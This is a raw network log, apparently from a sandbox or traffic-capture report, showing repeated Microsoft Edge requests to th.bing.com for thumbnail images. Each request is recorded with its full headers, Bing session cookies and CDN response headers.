cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1150
cache-control: public, max-age=1209600
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f3a9
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1753
x-check-cacheable: YES
cache-control: public, max-age=2250207
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f43f
-
GEThttps://th.bing.com/th?id=ODLS.b4a40212-560b-4e49-a115-50716e96c1fa&w=32&h=32&o=6&pid=AdsPlusmsedge.exeRemote address:88.221.135.16:443RequestGET /th?id=ODLS.b4a40212-560b-4e49-a115-50716e96c1fa&w=32&h=32&o=6&pid=AdsPlus HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 944
cache-control: public, max-age=1084708
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_HIT from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f445
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OIP.rF5uc7HhZOIGQs0K_sisGgHaEK&w=89&h=108&c=1&bgcl=bbbb97&r=0&o=6&pid=5.1msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=OIP.rF5uc7HhZOIGQs0K_sisGgHaEK&w=89&h=108&c=1&bgcl=bbbb97&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1302
cache-control: public, max-age=1209566
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f3aa
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OIP.yPKBYNPkJma2EDDUpaTYCwHaEK&w=89&h=53&c=1&bgcl=8fa6e9&r=0&o=6&pid=5.1msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=OIP.yPKBYNPkJma2EDDUpaTYCwHaEK&w=89&h=53&c=1&bgcl=8fa6e9&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2481
x-check-cacheable: YES
cache-control: public, max-age=1196234
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f440
-
GEThttps://th.bing.com/th?id=OIP.rwUJGzTxe8iMweKS-w-WlAHaHa&w=89&h=53&c=1&bgcl=5b9921&r=0&o=6&pid=5.1msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=OIP.rwUJGzTxe8iMweKS-w-WlAHaHa&w=89&h=53&c=1&bgcl=5b9921&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f3a1
-
GEThttps://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f39e
-
GEThttps://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1406
cache-control: public, max-age=1209600
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f484
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OIP.tr6XvvcoRBeW4TBXKIdMNgHaHa&w=80&h=80&c=7&qlt=80&o=6&pid=13.1msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=OIP.tr6XvvcoRBeW4TBXKIdMNgHaHa&w=80&h=80&c=7&qlt=80&o=6&pid=13.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
